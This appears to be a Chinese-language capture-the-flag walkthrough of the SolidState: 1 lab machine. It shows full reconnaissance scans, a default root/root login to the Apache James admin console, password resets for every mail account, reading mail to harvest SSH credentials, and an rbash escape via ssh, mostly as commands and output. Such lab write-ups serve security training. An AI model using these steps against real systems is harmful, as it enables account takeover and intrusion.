红队打靶练习:SOLIDSTATE: 1

news2024/12/26 12:18:57

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.137  00:50:56:27:5d:9b       VMware, Inc.
192.168.12.254  00:50:56:e4:dd:fa       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.358 seconds (108.57 hosts/sec). 4 responded

2、neidiscover
netdiscover -r 192.168.12.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.12.1    00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.12.2    00:50:56:ec:d1:ca      1      60  VMware, Inc.
 192.168.12.137  00:50:56:27:5d:9b      1      60  VMware, Inc.
 192.168.12.254  00:50:56:e4:dd:fa      1      60  VMware, Inc.


3、nmap
主机存活探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 08:45 CST
Nmap scan report for 192.168.12.1
Host is up (0.00011s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.00020s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.137
Host is up (0.00015s latency).
MAC Address: 00:50:56:27:5D:9B (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.00070s latency).
MAC Address: 00:50:56:E4:DD:FA (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.34 seconds


端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.137 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 08:45 CST
Nmap scan report for 192.168.12.137
Host is up (0.0041s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip
MAC Address: 00:50:56:27:5D:9B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.61 seconds


快速提取端口

┌──(root㉿ru)-[~/kali]
└─# cat ports.nmap | head -n 11 | tail -n 6 | awk '{print $1}' | awk -F "/" '{print($1)}' | xargs -n 6 | sed 's/ /,/g'
22,25,80,110,119,4555


信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -O -A -PN -p 22,25,80,110,119,4555 192.168.12.137 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 08:48 CST
Nmap scan report for 192.168.12.137
Host is up (0.00041s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (192.168.12.128 [192.168.12.128])
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
MAC Address: 00:50:56:27:5D:9B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 192.168.12.137

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.40 seconds


漏洞探测

┌──(root㉿ru)-[~/kali]
└─# nmap --script "vuln" -p 22,25,80,110,119,4555 192.168.12.137 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 08:51 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.137
Host is up (0.00017s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
| smtp-vuln-cve2010-4344:
|_  The SMTP server is not Exim: NOT VULNERABLE
80/tcp   open  http
| http-sql-injection:
|   Possible sqli for queries:
|     http://192.168.12.137:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/ie/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/ie/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/ie/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/ie/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.12.137:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /README.txt: Interesting, a readme.
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (de
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.12.137
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.12.137:80/
|     Form id: name
|     Form action: #
|
|     Path: http://192.168.12.137:80/about.html
|     Form id: name
|     Form action: #
|
|     Path: http://192.168.12.137:80/index.html
|     Form id: name
|     Form action: #
|
|     Path: http://192.168.12.137:80/services.html
|     Form id: name
|_    Form action: #
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip
MAC Address: 00:50:56:27:5D:9B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 70.91 seconds


4、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.12.137 nikto
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.12.137
+ Target Hostname:    192.168.12.137
+ Target Port:        80
+ Start Time:         2023-12-18 08:52:25 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ RFC-1918 /images: IP address found in the 'location' header. The IP is "fe80::c891:4b70:1cf0:a0fe". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "fe80::c891:4b70:1cf0:a0fe". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: 1e60, size: 5575af6de9eb2, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /images/: Directory indexing found.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2023-12-18 08:52:41 (GMT8) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


5、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.12.137
WhatWeb report for http://192.168.12.137
Status    : 200 OK
Title     : Home - Solid State Security
IP        : 192.168.12.137
Country   : RESERVED, ZZ

Summary   : Apache[2.4.25], Email[webadmin@solid-state-security.com], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], JQuery, Script

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.25 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Email ]
        Extract email addresses. Find valid email address and
        syntactically invalid email addresses from mailto: link
        tags. We match syntactically invalid links containing
        mailto: to catch anti-spam email addresses, eg. bob at
        gmail.com. This uses the simplified email regular
        expression from
        http://www.regular-expressions.info/email.html for valid
        email address matching.

        String       : webadmin@solid-state-security.com

[ HTML5 ]
        HTML version 5, detected by the doctype declaration


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Debian Linux
        String       : Apache/2.4.25 (Debian) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse
        HTML documents, handle events, perform animations, and add
        AJAX.

        Website     : http://jquery.com/

[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.


HTTP Headers:
        HTTP/1.1 200 OK
        Date: Mon, 18 Dec 2023 00:54:14 GMT
        Server: Apache/2.4.25 (Debian)
        Last-Modified: Tue, 22 Aug 2017 17:31:24 GMT
        ETag: "1e60-5575af6de9eb2-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 2383
        Connection: close
        Content-Type: text/html


22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

25/tcp   open  smtp        JAMES smtpd 2.3.2

80/tcp   open  http        Apache httpd 2.4.25 ((Debian))

110/tcp  open  pop3        JAMES pop3d 2.3.2

119/tcp  open  nntp        JAMES nntpd (posting ok)

4555/tcp open  james-admin JAMES Remote Admin 2.3.2

目录探测

1、gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.12.137 -x php,txt,html,bak -w /usr/share/dirb                                                                                                                                                                          uster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.12.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-m                                                                                                                                                                          edium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 7776]
/.html                (Status: 403) [Size: 294]
/images               (Status: 301) [Size: 317] [--> http://192.168.12.137/image                                                                                                                                                                          s/]
/about.html           (Status: 200) [Size: 7182]
/services.html        (Status: 200) [Size: 8404]
/assets               (Status: 301) [Size: 317] [--> http://192.168.12.137/asset                                                                                                                                                                          s/]
/README.txt           (Status: 200) [Size: 963]
/LICENSE.txt          (Status: 200) [Size: 17128]
/.html                (Status: 403) [Size: 294]
/server-status        (Status: 403) [Size: 302]


2、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.12.137 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.12.137/_23-12-18_09-00-07.txt

Target: http://192.168.12.137/

[09:00:07] Starting:
[09:00:09] 403 -  300B  - /.httr-oauth
[09:00:09] 403 -  303B  - /.htpasswd_test
[09:00:12] 200 -    3KB - /about.html
[09:00:22] 200 -  472B  - /assets/
[09:00:22] 301 -  317B  - /assets  ->  http://192.168.12.137/assets/
[09:00:35] 200 -  571B  - /images/
[09:00:35] 301 -  317B  - /images  ->  http://192.168.12.137/images/
[09:00:38] 200 -    6KB - /LICENSE.txt
[09:00:48] 200 -  606B  - /README.txt

Task Completed


3、dirb
┌──(root㉿ru)-[~/kali]
└─# dirb http://192.168.12.137

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Dec 18 09:00:23 2023
URL_BASE: http://192.168.12.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.12.137/ ----
==> DIRECTORY: http://192.168.12.137/assets/
==> DIRECTORY: http://192.168.12.137/images/
+ http://192.168.12.137/index.html (CODE:200|SIZE:7776)
+ http://192.168.12.137/server-status (CODE:403|SIZE:302)

---- Entering directory: http://192.168.12.137/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.12.137/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Dec 18 09:00:34 2023
DOWNLOADED: 4612 - FOUND: 2


110/tcp  open  pop3        JAMES pop3d 2.3.2
pop3是james的邮局服务协议,可以通过pop3协议来读邮件!

119/tcp  open  nntp        JAMES nntpd (posting ok)
119端口正在运行一个叫做 JAMES nntpd 的 NNTP(网络新闻传输协议)服务。
JAMES nntpd (posting ok) 表示这个 NNTP 服务允许用户发布(posting)新闻文章。
JAMES nntpd 可能是指 JAMES 邮件服务器的 NNTP 服务的一个组件。
NNTP 是用于阅读和发布 USENET 新闻组文章的协议。


4555/tcp open  james-admin JAMES Remote Admin 2.3.2

JAMES 是 邮件服务器的远程管理工具,是一个java写的工具,版本为2.3.2。


WEB




经过搜索,Apache James 2.3.2的默认登录账号以及密码都是root root

james登录

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 4555
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root

Welcome root. HELP for a list of commands
help

Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit
                                    close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
setpassword james root
Password for james reset
setpassword thomas root
Password for thomas reset
setpassword john root
Password for john reset
setpassword mindy root
Password for mindy reset
setpassword mailadmin root
Password for mailadmin reset


listusers 列出所有用户

setpassword username password   改密码

user: james
user: thomas
user: john
user: mindy
user: mailadmin


Telnet登录

1、查看邮件
┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user james
+OK
pass root
+OK Welcome james
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.


第一个用户没有邮件。

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user thomas
+OK
pass root
+OK Welcome thomas
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user john
+OK
pass root
+OK Welcome john
list
+OK 1 743
1 743
.
Connection closed by foreign host.

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass root
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mailadmin
+OK
pass root
+OK Welcome mailadmin
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.


经过telnet服务登录查看邮件发现只有john和mindy用户有邮件。

要通过 Telnet 连接到 POP3(邮局协议3)服务并读取邮件,我们有以下步骤操作:

2. 使用 Telnet 命令连接到目标主机的 POP3 服务

   telnet <pop3服务器地址> 110
   
   <pop3服务器地址>应替换为我们要连接的 POP3 服务器的实际地址。

3. 输入用户身份验证信息,通常包括用户名和密码:
   USER your_username
   PASS your_password
   
   将 your_username 和 your_password 替换为你的 POP3 账户的实际用户名和密码。

4. 列出邮件:
   LIST

5. 选择要读取的邮件:
   RETR 1

   这里的 "1" 就是我们想要读取的邮件编号。

这样我们就可以通过 Telnet 连接到 POP3 服务器并读取邮件。

2、读取邮件
john邮件

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user john
+OK
pass root
+OK Welcome john
list
+OK 1 743
1 743
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James


约翰,
你能不能限制mindy的访问权限,直到她读到这个程序。还要确保你给她发了一个临时密码来登录她的账户。
提前谢谢。
恕我直言,
詹姆斯


mindy邮件

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass root
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security.

Respectfully,
James
.

尊敬的Mindy:,
欢迎加入固态安全网络团队!我们很高兴你能以初级国防分析师的身份加入我们。你的角色对完成我们组织的使命至关重要。所附信息旨在介绍网络安全,并提供资源,帮助您顺利过渡到新角色。网络团队在这里支持您的过渡,因此,请知道您可以致电我们中的任何人来帮助您。
我们期待您加入我们的团队,并在Solid State Security取得成功。
恕我直言,
詹姆斯



retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

尊敬的Mindy:,
以下是您访问系统的ssh凭据。记得在第一次登录后重置密码。
您的访问目前受到限制,请随时要求您的主管将您需要的任何命令添加到您的路径中。



username: mindy
pass: P@55W0rd1!2@

Respectfully,
James



这两封邮件挺有意思,总之ssh登录账号以及密码给我们了。我们进行下一步!

SSH登录

┌──(root㉿ru)-[~/kali]
└─# ssh mindy@192.168.12.137
The authenticity of host '192.168.12.137 (192.168.12.137)' can't be established.
ED25519 key fingerprint is SHA256:rC5LxqIPhybBFae7BXE/MWyG4ylXjaZJn6z2/1+GmJg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.12.137' (ED25519) to the list of known hosts.
mindy@192.168.12.137's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ id
-rbash: id: command not found
mindy@solidstate:~$ ls
bin  user.txt
mindy@solidstate:~$ cat user.txt
914d0a4ebc1777889b5b89a23f556fd75
mindy@solidstate:~$ cd bin
-rbash: cd: restricted
mindy@solidstate:~$


我们获得了初级权限,并拿到了windy的flag,但是我们需要拿到root权限,部分命令权限没有对我们开放,这里使用了rbash限制了我们的部分命令。我们尝试绕过!

┌──(root㉿ru)-[~/kali]
└─# ssh mindy@192.168.12.137 -t "bash --noprofile"
mindy@192.168.12.137's password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd /home
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls -al
total 16
drwxr-xr-x  4 root  root    4096 Aug 22  2017 .
drwxr-xr-x 22 root  root    4096 Jun 18  2017 ..
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 james
drwxr-x---  4 mindy mindy   4096 Aug 22  2017 mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$



ssh绕过rbash

${debian_chroot:+($debian_chroot)}mindy@solidstate:~/bin$ ls -al
total 8
drwxr-x--- 2 mindy mindy 4096 Aug 22  2017 .
drwxr-x--- 4 mindy mindy 4096 Aug 22  2017 ..
lrwxrwxrwx 1 root  root     8 Aug 22  2017 cat -> /bin/cat
lrwxrwxrwx 1 root  root     8 Aug 22  2017 env -> /bin/env
lrwxrwxrwx 1 root  root     7 Aug 22  2017 ls -> /bin/ls
${debian_chroot:+($debian_chroot)}mindy@solidstate:~/bin$


如果没有绕过只能使用  cat、env、ls这三个命令!

${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls
james  mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cd james/
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home/james$ ls -al
total 84
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 .
drwxr-xr-x  4 root  root    4096 Aug 22  2017 ..
-rw-------  1 james osboxes  108 Aug 22  2017 .bash_history
-rw-r--r--  1 james osboxes  220 Jun 18  2017 .bash_logout
-rw-r--r--  1 james osboxes 3526 Jun 18  2017 .bashrc
drwx------  8 james osboxes 4096 Aug 22  2017 .cache
drwx------ 10 james osboxes 4096 Aug 22  2017 .config
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Desktop
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Documents
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Downloads
drwx------  3 james osboxes 4096 Aug 22  2017 .gnupg
-rw-------  1 james osboxes  640 Aug 22  2017 .ICEauthority
drwxr-xr-x  3 james osboxes 4096 Jun 18  2017 .local
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Music
drwxr-xr-x  2 james osboxes 4096 Aug 22  2017 .nano
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Pictures
-rw-r--r--  1 james osboxes  675 Jun 18  2017 .profile
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Public
drwx------  2 james osboxes 4096 Aug 22  2017 .ssh
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Templates
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Videos
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home/james$ ls -alR
.:
total 84
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 .
drwxr-xr-x  4 root  root    4096 Aug 22  2017 ..
-rw-------  1 james osboxes  108 Aug 22  2017 .bash_history
-rw-r--r--  1 james osboxes  220 Jun 18  2017 .bash_logout
-rw-r--r--  1 james osboxes 3526 Jun 18  2017 .bashrc
drwx------  8 james osboxes 4096 Aug 22  2017 .cache
drwx------ 10 james osboxes 4096 Aug 22  2017 .config
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Desktop
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Documents
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Downloads
drwx------  3 james osboxes 4096 Aug 22  2017 .gnupg
-rw-------  1 james osboxes  640 Aug 22  2017 .ICEauthority
drwxr-xr-x  3 james osboxes 4096 Jun 18  2017 .local
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Music
drwxr-xr-x  2 james osboxes 4096 Aug 22  2017 .nano
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Pictures
-rw-r--r--  1 james osboxes  675 Jun 18  2017 .profile
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Public
drwx------  2 james osboxes 4096 Aug 22  2017 .ssh
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Templates
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Videos
ls: cannot open directory './.cache': Permission denied
ls: cannot open directory './.config': Permission denied

./Desktop:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..

./Documents:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..

./Downloads:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..
ls: cannot open directory './.gnupg': Permission denied

./.local:
total 12
drwxr-xr-x  3 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..
